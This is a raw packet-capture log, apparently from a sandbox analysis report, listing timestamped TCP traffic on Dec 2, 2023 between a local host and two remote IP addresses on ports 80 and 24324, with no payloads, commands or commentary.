                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045483112 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045495033 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045507908 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045519114 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045521021 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045531988 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045543909 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045551062 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045566082 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045578003 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045582056 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045591116 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045603037 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045607090 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045633078 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045639038 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045660019 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045671940 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045680046 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045685053 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045700073 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045711040 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045711994 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045725107 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045737028 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.045763969 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.047079086 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.047089100 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.047100067 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.047163010 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.047219992 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.300884962 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.300900936 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.300960064 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301012993 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301013947 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301026106 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301059961 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301090002 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301126957 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301137924 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301163912 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.301176071 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.337850094 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.337907076 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.337922096 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.337973118 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338166952 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338229895 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338252068 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338273048 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338314056 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338335037 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338349104 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338365078 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338380098 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338388920 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338393927 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338407993 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338419914 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338421106 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338433981 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338447094 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338449955 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338464975 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338475943 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338479996 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338493109 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338501930 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338506937 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338520050 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338530064 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338534117 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338546991 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338557959 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338560104 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338572979 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338582993 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338587046 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338599920 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338610888 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338610888 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338625908 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338638067 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338638067 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338653088 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338660955 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338666916 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338681936 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338690042 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338695049 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338717937 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338752985 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338767052 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338779926 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338790894 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338795900 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338809967 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338821888 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338835955 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338845968 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338851929 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338866949 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338881016 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338890076 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338895082 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338917971 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338936090 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338949919 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338963985 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338975906 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338977098 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338989973 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.338999033 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339003086 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339016914 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339030981 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339034081 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339045048 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339047909 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339085102 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339112997 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339128017 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339140892 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339152098 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339162111 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339164972 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339179993 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339190960 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339234114 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339246988 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339257002 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339262962 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339277029 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339289904 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339293003 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339304924 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339317083 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339329004 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339329004 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339344978 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339358091 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339370012 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339374065 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339384079 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339390993 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339397907 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339411020 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339412928 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339426994 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339426994 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339441061 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339452982 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339479923 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339483976 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339498043 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339513063 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339534998 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339550018 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339576960 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339590073 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339601994 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339634895 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339637041 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339667082 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339690924 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.339710951 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.417995930 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554692030 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554708004 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554719925 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554729939 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554739952 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554779053 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554790020 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554811001 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554867029 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554879904 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554904938 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554913998 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554919958 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554930925 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554975986 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.554995060 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555006981 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555016041 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555027008 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555088997 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555164099 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555174112 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555191040 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555226088 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.555249929 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631724119 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631745100 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631757975 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631769896 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631791115 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631829023 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631843090 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631855965 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631880999 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631891012 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631932020 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631931067 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.631957054 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632061005 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632076025 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632091045 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632107973 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632129908 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632141113 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632177114 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632189035 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632201910 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632216930 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632263899 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632277012 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632289886 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632302046 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632313967 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632332087 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632343054 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632380009 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632394075 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632405996 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632419109 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632442951 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632442951 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632452965 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632464886 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632476091 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632488012 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632489920 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632515907 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632570028 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632584095 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632597923 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632632971 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632692099 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632704973 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632715940 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632719994 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632728100 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632740021 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632749081 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632752895 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632764101 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632765055 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632796049 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632805109 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632817984 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632827997 CET8049723211.119.84.112192.168.2.6
